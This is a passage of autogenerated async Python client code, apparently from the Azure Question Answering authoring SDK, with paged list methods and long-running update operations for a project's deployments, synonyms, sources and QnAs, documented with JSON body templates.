return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def list_deployments(
self, project_name: str, *, top: Optional[int] = None, skip: Optional[int] = None, **kwargs: Any
) -> AsyncIterable[JSON]:
"""List all deployments of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/list-deployments
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:keyword top: The maximum number of resources to return from the collection. Default value is
None.
:paramtype top: int
:keyword skip: An offset into the collection of the first resource to be returned. Default
value is None.
:paramtype skip: int
:return: An iterator like instance of JSON object
:rtype: ~azure.core.async_paging.AsyncItemPaged[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"deploymentName": "str", # Optional. Name of the deployment.
"lastDeployedDateTime": "2020-02-20 00:00:00" # Optional. Represents the
project last deployment date-time.
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_deployments_request(
project_name=project_name,
top=top,
skip=skip,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
return request
async def extract_data(pipeline_response):
deserialized = pipeline_response.http_response.json()
list_of_elem = deserialized["value"]
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.get("nextLink", None), AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
@distributed_trace
def list_synonyms(
self, project_name: str, *, top: Optional[int] = None, skip: Optional[int] = None, **kwargs: Any
) -> AsyncIterable[JSON]:
"""Gets all the synonyms of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/get-synonyms
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:keyword top: The maximum number of resources to return from the collection. Default value is
None.
:paramtype top: int
:keyword skip: An offset into the collection of the first resource to be returned. Default
value is None.
:paramtype skip: int
:return: An iterator like instance of JSON object
:rtype: ~azure.core.async_paging.AsyncItemPaged[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"alterations": [
"str" # Collection of word alterations. Required.
]
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_synonyms_request(
project_name=project_name,
top=top,
skip=skip,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
return request
async def extract_data(pipeline_response):
deserialized = pipeline_response.http_response.json()
list_of_elem = deserialized["value"]
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.get("nextLink", None), AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
@overload
async def update_synonyms( # pylint: disable=inconsistent-return-statements
self, project_name: str, synonyms: JSON, *, content_type: str = "application/json", **kwargs: Any
) -> None:
"""Updates all the synonyms of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-synonyms
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param synonyms: All the synonyms of a project. Required.
:type synonyms: JSON
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
synonyms = {
"nextLink": "str", # Optional.
"value": [
{
"alterations": [
"str" # Collection of word alterations. Required.
]
}
]
}
"""
@overload
async def update_synonyms( # pylint: disable=inconsistent-return-statements
self, project_name: str, synonyms: IO, *, content_type: str = "application/json", **kwargs: Any
) -> None:
"""Updates all the synonyms of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-synonyms
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param synonyms: All the synonyms of a project. Required.
:type synonyms: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def update_synonyms( # pylint: disable=inconsistent-return-statements
self, project_name: str, synonyms: Union[JSON, IO], **kwargs: Any
) -> None:
"""Updates all the synonyms of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-synonyms
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param synonyms: All the synonyms of a project. Is either a model type or a IO type. Required.
:type synonyms: JSON or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[None]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(synonyms, (IO, bytes)):
_content = synonyms
else:
_json = synonyms
request = build_update_synonyms_request(
project_name=project_name,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
@distributed_trace
def list_sources(
self, project_name: str, *, top: Optional[int] = None, skip: Optional[int] = None, **kwargs: Any
) -> AsyncIterable[JSON]:
"""Gets all the sources of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/get-sources
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:keyword top: The maximum number of resources to return from the collection. Default value is
None.
:paramtype top: int
:keyword skip: An offset into the collection of the first resource to be returned. Default
value is None.
:paramtype skip: int
:return: An iterator like instance of JSON object
:rtype: ~azure.core.async_paging.AsyncItemPaged[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"sourceKind": "str", # Supported source types. Required. Known values are:
"file" and "url".
"sourceUri": "str", # URI location for the file or url. Required.
"contentStructureKind": "str", # Optional. Content structure type for
sources. "unstructured"
"displayName": "str", # Optional. Friendly name of the Source.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"source": "str" # Optional. Unique source identifier. Name of the file if
it's a 'file' source; otherwise, the complete URL if it's a 'url' source.
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_sources_request(
project_name=project_name,
top=top,
skip=skip,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
return request
async def extract_data(pipeline_response):
deserialized = pipeline_response.http_response.json()
list_of_elem = deserialized["value"]
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.get("nextLink", None), AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
async def _update_sources_initial(
self, project_name: str, sources: Union[List[JSON], IO], **kwargs: Any
) -> Optional[JSON]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[Optional[JSON]]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(sources, (IO, bytes)):
_content = sources
else:
_json = sources
request = build_update_sources_request(
project_name=project_name,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
response_headers = {}
if response.status_code == 200:
if response.content:
deserialized = response.json()
else:
deserialized = None
if response.status_code == 202:
response_headers["Operation-Location"] = self._deserialize(
"str", response.headers.get("Operation-Location")
)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
@overload
async def begin_update_sources(
self, project_name: str, sources: List[JSON], *, content_type: str = "application/json", **kwargs: Any
) -> AsyncLROPoller[AsyncIterable[JSON]]:
"""Updates the sources of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-sources
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param sources: Update sources parameters of a project. Required.
:type sources: list[JSON]
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns an iterator like instance of JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.core.async_paging.AsyncItemPaged[JSON]]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
sources = [
{
"op": "str", # Update operation type for assets. Required. Known
values are: "add", "delete", and "replace".
"value": {
"sourceKind": "str", # Supported source types. Required.
Known values are: "file" and "url".
"sourceUri": "str", # URI location for the file or url.
Required.
"contentStructureKind": "str", # Optional. Content structure
type for sources. "unstructured"
"displayName": "str", # Optional. Friendly name of the
Source.
"refresh": bool, # Optional. Boolean flag used to refresh
data from the Source.
"source": "str" # Optional. Unique source identifier. Name
of the file if it's a 'file' source; otherwise, the complete URL if it's
a 'url' source.
}
}
]
# response body for status code(s): 200, 202
response == {
"sourceKind": "str", # Supported source types. Required. Known values are:
"file" and "url".
"sourceUri": "str", # URI location for the file or url. Required.
"contentStructureKind": "str", # Optional. Content structure type for
sources. "unstructured"
"displayName": "str", # Optional. Friendly name of the Source.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"source": "str" # Optional. Unique source identifier. Name of the file if
it's a 'file' source; otherwise, the complete URL if it's a 'url' source.
}
"""
@overload
async def begin_update_sources(
self, project_name: str, sources: IO, *, content_type: str = "application/json", **kwargs: Any
) -> AsyncLROPoller[AsyncIterable[JSON]]:
"""Updates the sources of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-sources
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param sources: Update sources parameters of a project. Required.
:type sources: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns an iterator like instance of JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.core.async_paging.AsyncItemPaged[JSON]]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response == {
"sourceKind": "str", # Supported source types. Required. Known values are:
"file" and "url".
"sourceUri": "str", # URI location for the file or url. Required.
"contentStructureKind": "str", # Optional. Content structure type for
sources. "unstructured"
"displayName": "str", # Optional. Friendly name of the Source.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"source": "str" # Optional. Unique source identifier. Name of the file if
it's a 'file' source; otherwise, the complete URL if it's a 'url' source.
}
"""
@distributed_trace_async
async def begin_update_sources(
self, project_name: str, sources: Union[List[JSON], IO], **kwargs: Any
) -> AsyncLROPoller[AsyncIterable[JSON]]:
"""Updates the sources of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-sources
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param sources: Update sources parameters of a project. Is either a list type or a IO type.
Required.
:type sources: list[JSON] or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns an iterator like instance of JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.core.async_paging.AsyncItemPaged[JSON]]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response == {
"sourceKind": "str", # Supported source types. Required. Known values are:
"file" and "url".
"sourceUri": "str", # URI location for the file or url. Required.
"contentStructureKind": "str", # Optional. Content structure type for
sources. "unstructured"
"displayName": "str", # Optional. Friendly name of the Source.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"source": "str" # Optional. Unique source identifier. Name of the file if
it's a 'file' source; otherwise, the complete URL if it's a 'url' source.
}
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(sources, (IO, bytes)):
_content = sources
else:
_json = sources
def prepare_request(next_link=None):
if not next_link:
request = build_update_sources_request(
project_name=project_name,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
return request
async def extract_data(pipeline_response):
deserialized = pipeline_response.http_response.json()
list_of_elem = deserialized["value"]
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.get("nextLink", None), AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_sources_initial( # type: ignore
project_name=project_name,
sources=sources,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
async def internal_get_next(next_link=None):
if next_link is None:
return pipeline_response
return await get_next(next_link)
return AsyncItemPaged(internal_get_next, extract_data)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method = cast(
AsyncPollingMethod,
AsyncLROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs),
) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def list_qnas(
self,
project_name: str,
*,
source: Optional[str] = None,
top: Optional[int] = None,
skip: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable[JSON]:
"""Gets all the QnAs of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/get-qnas
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:keyword source: Source of the QnA. Default value is None.
:paramtype source: str
:keyword top: The maximum number of resources to return from the collection. Default value is
None.
:paramtype top: int
:keyword skip: An offset into the collection of the first resource to be returned. Default
value is None.
:paramtype skip: int
:return: An iterator like instance of JSON object
:rtype: ~azure.core.async_paging.AsyncItemPaged[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"activeLearningSuggestions": [
{
"clusterHead": "str", # Optional. Question chosen as the
head of suggested questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The
number of times the question was suggested automatically by the
Active Learning algorithm.
"question": "str", # Optional. Question
suggested by the Active Learning feature.
"userSuggestedCount": 0 # Optional. The
number of times the question was suggested explicitly by the
user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": {
"isContextOnly": bool, # Optional. To mark if a prompt is relevant
only with a previous question or not. If true, do not include this QnA as
answer for queries without context; otherwise, ignores context and includes
this QnA in answers.
"prompts": [
{
"displayOrder": 0, # Optional. Index of the prompt.
It is used for ordering of the prompts.
"displayText": "str", # Optional. Text displayed to
represent a follow up question prompt.
"qna": {
"activeLearningSuggestions": [
{
"clusterHead": "str", #
Optional. Question chosen as the head of suggested
questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The number
of times the question was suggested automatically
by the Active Learning algorithm.
"question":
"str", # Optional. Question suggested by the
Active Learning feature.
"userSuggestedCount": 0 # Optional. The number
of times the question was suggested explicitly by
the user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": ...,
"id": 0, # Optional. Unique ID for the QnA.
"metadata": {
"str": "str" # Optional. Metadata
associated with the answer, useful to categorize or filter
question answers.
},
"questions": [
"str" # Optional. List of questions
associated with the answer.
],
"source": "str" # Optional. Source from
which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs
.
},
"qnaId": 0 # Optional. ID of the QnA corresponding
to the prompt.
}
]
},
"id": 0, # Optional. Unique ID for the QnA.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"metadata": {
"str": "str" # Optional. Metadata associated with the answer, useful
to categorize or filter question answers.
},
"questions": [
"str" # Optional. List of questions associated with the answer.
],
"source": "str" # Optional. Source from which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs .
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_qnas_request(
project_name=project_name,
source=source,
top=top,
skip=skip,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
return request
async def extract_data(pipeline_response):
deserialized = pipeline_response.http_response.json()
list_of_elem = deserialized["value"]
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.get("nextLink", None), AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
async def _update_qnas_initial(
self, project_name: str, qnas: Union[List[JSON], IO], **kwargs: Any
) -> Optional[JSON]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[Optional[JSON]]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(qnas, (IO, bytes)):
_content = qnas
else:
_json = qnas
request = build_update_qnas_request(
project_name=project_name,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
response_headers = {}
if response.status_code == 200:
if response.content:
deserialized = response.json()
else:
deserialized = None
if response.status_code == 202:
response_headers["Operation-Location"] = self._deserialize(
"str", response.headers.get("Operation-Location")
)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
@overload
async def begin_update_qnas(
self, project_name: str, qnas: List[JSON], *, content_type: str = "application/json", **kwargs: Any
) -> AsyncLROPoller[AsyncIterable[JSON]]:
"""Updates the QnAs of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-qnas
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param qnas: Update QnAs parameters of a project. Required.
:type qnas: list[JSON]
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns an iterator like instance of JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.core.async_paging.AsyncItemPaged[JSON]]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
qnas = [
{
"op": "str", # Update operation type for assets. Required. Known
values are: "add", "delete", and "replace".
"value": {
"activeLearningSuggestions": [
{
"clusterHead": "str", # Optional. Question
chosen as the head of suggested questions cluster by Active
Learning clustering algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, #
Optional. The number of times the question was suggested
automatically by the Active Learning algorithm.
"question": "str", #
Optional. Question suggested by the Active Learning
feature.
"userSuggestedCount": 0 #
Optional. The number of times the question was suggested
explicitly by the user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": {
"isContextOnly": bool, # Optional. To mark if a
prompt is relevant only with a previous question or not. If true, do
not include this QnA as answer for queries without context;
otherwise, ignores context and includes this QnA in answers.
"prompts": [
{
"displayOrder": 0, # Optional. Index
of the prompt. It is used for ordering of the prompts.
"displayText": "str", # Optional.
Text displayed to represent a follow up question prompt.
"qna": ...,
"qnaId": 0 # Optional. ID of the QnA
corresponding to the prompt.
}
]
},
"id": 0, # Optional. Unique ID for the QnA.
"metadata": {
"str": "str" # Optional. Metadata associated with
the answer, useful to categorize or filter question answers.
},
"questions": [
"str" # Optional. List of questions associated with
the answer.
],
"source": "str" # Optional. Source from which QnA was
indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs .
}
}
]
# response body for status code(s): 200, 202
response == {
"activeLearningSuggestions": [
{
"clusterHead": "str", # Optional. Question chosen as the
head of suggested questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The
number of times the question was suggested automatically by the
Active Learning algorithm.
"question": "str", # Optional. Question
suggested by the Active Learning feature.
"userSuggestedCount": 0 # Optional. The
number of times the question was suggested explicitly by the
user.
}
]
}
],
